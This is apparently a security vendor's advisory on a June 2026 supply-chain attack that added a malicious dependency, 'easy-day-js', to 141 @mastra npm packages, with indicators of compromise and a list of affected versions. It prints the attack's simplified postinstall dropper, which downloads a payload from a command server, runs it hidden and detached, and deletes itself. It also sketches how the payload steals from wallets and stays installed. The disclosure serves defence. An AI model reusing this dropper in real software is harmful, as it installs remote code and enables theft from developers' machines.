# Over 140 popular Mastra npm Packages Hit by Supply Chain Attack > Source: > Published: 2026-06-17 08:43:00+00:00 On June 17th we detected a large-scale supply chain attack targeting the entire `@mastra` npm scope, a popular open-source AI agent framework. An attacker republished 141 packages in a burst between 01:15 and 02:00 UTC, silently injecting a malicious dependency into every one of them. The affected packages include `@mastra/core` , which has 918K weekly npm downloads, as well as `mastra` and `create-mastra` . ## The postinstall script All 141 packages had a single new dependency added to their `package.json` : `easy-day-js` , a malicious clone of the popular date library `dayjs` . The package was published by a separate attacker-controlled account a day before the scope takeover. Crucially, the initial release (1.11.21) was completely clean, a straight copy of `dayjs` with no install hooks. The malicious version (1.11.22) followed the next day, right around the time the `@mastra` packages were republished. The compromised packages depend on `^1.11.21` , but npm's caret resolution automatically pulls in the malicious 1.11.22 as the latest version, while auditing the pinned version reveals nothing suspicious. Version 1.11.22 adds a `postinstall` hook that runs `setup.cjs` , an obfuscated script that executes automatically at install time without any user interaction. ``` js // obfuscated -- stripped down to the essential logic const payload = await (await fetch('https://23[.]254[.]164[.]92:8000/update/49890878')).text(); const file = path.join(os.tmpdir(), crypto.randomBytes(12).toString('hex') + '.js'); fs.writeFileSync(file, payload, 'utf8'); child_process.spawn(process.execPath, [file, '23[.]254[.]164[.]123:443'], { detached: true, stdio: 'ignore', windowsHide: true }).unref(); fs.rmSync(__filename, { force: true }); // self-deletes ``` What this script does, step by step: - Fetches a second-stage payload from the C2 server at `23[.]254[.]164[.]92:8000` - Writes the payload to a randomly named `.js` file in the OS temp directory - Spawns the payload as a fully detached background process, invisible on all platforms ( `stdio: ignore, windowsHide: true` ), passing a second C2 host`23[.]254[.]164[.]123:443` as an argument - Self-deletes to remove forensic evidence of the postinstall hook The second stage runs as a long-lived background process that collects system information and targets over 160 browser-based crypto wallet extensions, including MetaMask, Keplr, Coinbase, and more. It establishes persistence by disguising itself as node-related tools on macOS, Windows, and Linux, all phoning home to `23[.]254[.]164[.]123:443` . ## Similarities with the axios compromise The playbook here is nearly identical to the [axios compromise](https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat) we covered in March 2026. In both attacks, the attacker avoided touching the target package's own code and instead injected a malicious dependency, relying on npm's `postinstall` hook to execute the payload automatically at install time. Both staged a clean decoy version first, then followed with the malicious one. In the axios attack, `plain-crypto-js` played the role that `easy-day-js` plays here. Both droppers also self-delete after execution to remove forensic evidence. The infrastructure also follows the same pattern. The axios dropper called back to a Hostwinds VPS on port 8000. The `easy-day-js` dropper does the same, hitting `23[.]254[.]164[.]92:8000` on Hostwinds infrastructure. ## How Aikido detects this If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now. If you are not yet an Aikido user, you can [create an account](https://app.aikido.dev/login) and connect your repos. Our malware coverage is included in the free plan, no credit card required. For broader coverage across your whole team, Aikido's [Device Protection](https://www.aikido.dev/protect/device-protection) gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed. For future protection, consider [Aikido Safe Chain](https://github.com/AikidoSec/safe-chain) (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against [Aikido Intel](https://intel.aikido.dev/) before install. ## Indicators of Compromise **Network indicators** `23[.]254[.]164[.]92:8000` — first-stage C2, payload download`23[.]254[.]164[.]123:443 ` — second-stage callback host, passed to the spawned RAT **Affected packages** easy-day-js@1.11.22 create-mastra@1.13.1 mastra@1.13.1 @mastra/acp@0.2.2 @mastra/agent-browser@0.3.2 @mastra/agent-builder@1.0.42 @mastra/agentcore@0.2.2 @mastra/agentfs@0.1.1 @mastra/ai-sdk@1.4.6 @mastra/arize@1.2.3 @mastra/arthur@0.3.3 @mastra/astra@1.0.2 @mastra/auth@1.0.3 @mastra/auth-auth0@1.0.2 @mastra/auth-better-auth@1.0.4 @mastra/auth-clerk@1.0.3 @mastra/auth-cloud@1.1.4 @mastra/auth-firebase@1.0.1 @mastra/auth-okta@0.0.5 @mastra/auth-studio@1.2.4 @mastra/auth-supabase@1.0.2 @mastra/auth-workos@1.5.3 @mastra/azure@0.2.3 @mastra/blaxel@0.4.2 @mastra/braintrust@1.1.4 @mastra/brightdata@0.2.2 @mastra/browser-firecrawl@0.1.1 @mastra/browser-viewer@0.1.3 @mastra/chroma@1.0.2 @mastra/claude@1.0.3 @mastra/clickhouse@1.10.1 @mastra/client-js@1.24.1 @mastra/cloud@0.1.24 @mastra/cloudflare@1.4.2 @mastra/cloudflare-d1@1.0.7 @mastra/codemod@1.0.4 @mastra/convex@1.2.2 @mastra/core@1.42.1 @mastra/couchbase@1.0.4 @mastra/cursor@0.2.1 @mastra/dane@1.0.2 @mastra/datadog@1.2.5 @mastra/daytona@0.4.2 @mastra/deployer@1.42.1 @mastra/deployer-cloud@1.42.1 @mastra/deployer-cloudflare@1.1.44 @mastra/deployer-netlify@1.1.20 @mastra/deployer-vercel@1.1.38 @mastra/docker@0.3.1 @mastra/dsql@1.0.3 @mastra/duckdb@1.4.3 @mastra/dynamodb@1.0.9 @mastra/e2b@0.3.4 @mastra/editor@0.11.3 @mastra/elasticsearch@1.2.1 @mastra/engine@0.1.1 @mastra/evals@1.3.1 @mastra/express@1.3.31 @mastra/fastembed@1.1.3 @mastra/fastify@1.3.31 @mastra/files-sdk@0.2.1 @mastra/gcs@0.2.3 @mastra/github-signals@0.1.2 @mastra/google-cloud-pubsub@1.0.6 @mastra/google-drive@0.1.1 @mastra/hono@1.4.26 @mastra/inngest@1.5.2 @mastra/koa@1.5.14 @mastra/laminar@1.2.3 @mastra/lance@1.0.7 @mastra/langfuse@1.3.6 @mastra/langsmith@1.2.4 @mastra/libsql@1.13.1 @mastra/loggers@1.1.3 @mastra/longmemeval@1.0.50 @mastra/mcp@1.10.1 @mastra/mcp-docs-server@1.1.47 @mastra/mcp-registry-registry@1.0.2 @mastra/mem0@0.1.14 @mastra/memory@1.20.4 @mastra/modal@0.2.2 @mastra/mongodb@1.9.3 @mastra/mssql@1.3.2 @mastra/mysql@0.1.1 @mastra/nestjs@0.1.15 @mastra/node-audio@0.1.8 @mastra/node-speaker@0.1.1 @mastra/observability@1.14.2 @mastra/openai@1.0.2 @mastra/opencode@0.0.47 @mastra/opensearch@1.0.3 @mastra/otel-bridge@1.2.3 @mastra/otel-exporter@1.2.3 @mastra/perplexity@0.1.1 @mastra/pg@1.13.1 @mastra/pinecone@1.0.2 @mastra/playground-ui@33.0.1 @mastra/posthog@1.0.29 @mastra/qdrant@1.0.3 @mastra/rag@2.2.2 @mastra/railway@0.1.1 @mastra/react@1.0.1 @mastra/redis@1.1.3 @mastra/redis-streams@0.0.4 @mastra/s3@0.5.3 @mastra/s3vectors@1.0.7 @mastra/schema-compat@1.2.12 @mastra/sentry@1.1.4 @mastra/server@2.1.1 @mastra/slack@1.3.1 @mastra/spanner@1.1.2 @mastra/speech-azure@0.2.1 @mastra/speech-elevenlabs@0.2.1 @mastra/speech-google@0.2.1 @mastra/speech-ibm@0.2.1 @mastra/speech-murf@0.2.1 @mastra/speech-openai@0.2.1 @mastra/speech-replicate@0.2.1 @mastra/speech-speechify@0.2.1 @mastra/stagehand@0.2.5 @mastra/tavily@1.0.3 @mastra/temporal@0.1.14 @mastra/turbopuffer@1.0.3 @mastra/twilio@1.0.2 @mastra/upstash@1.1.3 @mastra/vectorize@1.0.3 @mastra/vercel@1.0.1 @mastra/voice-aws-nova-sonic@0.1.4 @mastra/voice-azure@0.11.2 @mastra/voice-cloudflare@0.12.3 @mastra/voice-deepgram@0.12.2 @mastra/voice-elevenlabs@0.12.2 @mastra/voice-gladia@0.12.2 @mastra/voice-google@0.12.3 @mastra/voice-google-gemini-live@0.12.2 @mastra/voice-inworld@0.3.1 @mastra/voice-modelslab@0.1.2 @mastra/voice-murf@0.12.3 @mastra/voice-openai@0.12.3 @mastra/voice-openai-realtime@0.12.6 @mastra/voice-playai@0.12.2 @mastra/voice-sarvam@1.0.2 @mastra/voice-speechify@0.12.2 @mastra/voice-xai-realtime@0.1.2